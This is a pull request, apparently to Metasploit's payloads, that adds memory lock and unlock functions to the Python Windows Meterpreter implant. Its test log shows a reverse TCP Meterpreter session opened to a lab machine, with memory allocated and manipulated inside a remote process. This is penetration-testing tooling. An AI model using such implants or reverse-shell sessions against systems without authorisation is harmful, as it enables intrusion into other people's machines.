### PR TITLE
add memory lock/unlock abilties to python windows meterpreter

### DIFF
--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -1638,6 +1638,32 @@ def stdapi_sys_process_memory_allocate(request, response):
     return ERROR_SUCCESS, response
 
 @register_function_if(has_windll)
+def stdapi_sys_process_memory_lock(request, response):
+    base = packet_get_tlv(request, TLV_TYPE_BASE_ADDRESS).get('value', 0)
+    size = packet_get_tlv(request, TLV_TYPE_LENGTH).get('value', 0)
+
+    VirtualLock = ctypes.windll.kernel32.VirtualLock
+    VirtualLock.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
+    VirtualLock.restype = ctypes.c_long
+
+    if not VirtualLock(base, size):
+        return error_result_windows(), response
+    return ERROR_SUCCESS, response
+
+@register_function_if(has_windll)
+def stdapi_sys_process_memory_unlock(request, response):
+    base = packet_get_tlv(request, TLV_TYPE_BASE_ADDRESS).get('value', 0)
+    size = packet_get_tlv(request, TLV_TYPE_LENGTH).get('value', 0)
+
+    VirtualUnlock = ctypes.windll.kernel32.VirtualUnlock
+    VirtualUnlock.argtypes = [ctypes.c_void_p, ctypes.c_size_t]
+    VirtualUnlock.restype = ctypes.c_long
+
+    if not VirtualUnlock(base, size):
+        return error_result_windows(), response
+    return ERROR_SUCCESS, response
+
+@register_function_if(has_windll)
 def stdapi_sys_process_memory_free(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_HANDLE).get('value', 0)
     base   = packet_get_tlv(request, TLV_TYPE_BASE_ADDRESS).get('value', 0)


### PR DESCRIPTION
This PR adds two memory functions to python meterpreter on windows platform:
- stdapi_sys_process_memory_lock
- stdapi_sys_process_memory_unlock

Tested with:
- Python 3.10.8
- Python 2.7

Test output:
```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.22:4444 
[*] Sending stage (24772 bytes) to 10.0.0.3
[*] Meterpreter session 11 opened (10.0.0.22:4444 -> 10.0.0.3:49691) at 2023-04-07 14:48:28 -0400

meterpreter > sysinfo 
Computer        : DESKTOP-4CQE3PS
OS              : Windows 10 (Build 19041)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > pry
[*] Starting Pry shell...
[*] You are in the "client" (session) object

[1] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc = sys.process.open(1444)
=> #<#<Class:0x00007f098be314f8>:0x00007f098a8d1040
 @aliases=
  {"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x00007f098a8d0ed8 @process=#<#<Class:0x00007f098be314f8>:0x00007f098a8d1040 ...>>,
   "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x00007f098a8d0e88 @process=#<#<Class:0x00007f098be314f8>:0x00007f098a8d1040 ...>>,
   "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x00007f098a8d0de8 @process=#<#<Class:0x00007f098be314f8>:0x00007f098a8d1040 ...>>,
   "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x00007f098a8d0d98 @process=#<#<Class:0x00007f098be314f8>:0x00007f098a8d1040 ...>>},
 @channel=nil,
 @client=#<Session:meterpreter 10.0.0.3:49691 (10.0.0.3) "DESKTOP-4CQE3PS\admin @ DESKTOP-4CQE3PS">,
 @handle=880,
 @pid=1444>
[2] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> addr = proc.memory.allocate(1000)
=> 1769472
[3] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.lock(addr, 1000)
=> true
[4] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> proc.memory.unlock(addr, 1000)
=> true
[5] pry(#<Msf::Sessions::Meterpreter_Python_Python>)> quit
meterpreter >
```